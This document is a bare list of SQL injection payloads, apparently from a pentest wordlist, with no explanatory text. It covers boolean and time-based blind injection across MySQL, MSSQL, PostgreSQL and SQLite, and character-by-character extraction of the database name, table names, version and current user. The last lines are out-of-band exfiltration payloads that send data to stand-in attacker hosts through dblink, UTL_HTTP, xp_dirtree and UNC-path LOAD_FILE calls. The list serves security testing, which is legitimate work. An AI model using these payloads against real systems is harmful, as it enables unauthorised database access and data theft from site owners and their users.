1' AND 1=1-- -
1' AND 1=2-- -
1' AND (SELECT SLEEP(5))-- -
1' AND IF(1=1,SLEEP(5),0)-- -
1' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)-- -
1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)='u',SLEEP(5),0)-- -
1' AND IF(SUBSTRING(version(),1,1)='5',SLEEP(5),0)-- -
1' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)-- -
1' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -
1'; WAITFOR DELAY '0:0:5'-- -
1'; IF(1=1) WAITFOR DELAY '0:0:5'-- -
1'; IF((SELECT SUBSTRING(DB_NAME(),1,1))='m') WAITFOR DELAY '0:0:5'-- -
1' AND pg_sleep(5)-- -
1'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- -
1' AND (SELECT CASE WHEN (SUBSTRING(current_user,1,1)='p') THEN pg_sleep(5) ELSE pg_sleep(0) END)-- -
1' AND RANDOMBLOB(500000000)-- -
1' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))-- -
1' AND (SELECT COUNT(*) FROM generate_series(1,5000000))>0-- -
1' AND 1=(SELECT 1 FROM PG_SLEEP(5))-- -
1' AND (SELECT * FROM dblink('host=attacker.com user=test password=test dbname=test','SELECT 1') RETURNS (i int))='1'-- -
1' UNION SELECT NULL,(SELECT UTL_HTTP.REQUEST('http://attacker.com/'||version) FROM v$instance)-- -
1'; EXEC master..xp_dirtree '\\attacker.com\share'-- -
1' UNION SELECT NULL,LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\share'))-- -
1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT LOAD_FILE(CONCAT('\\\\',database(),'.attacker.burpcollaborator.net\\a'))),0x7e))-- -
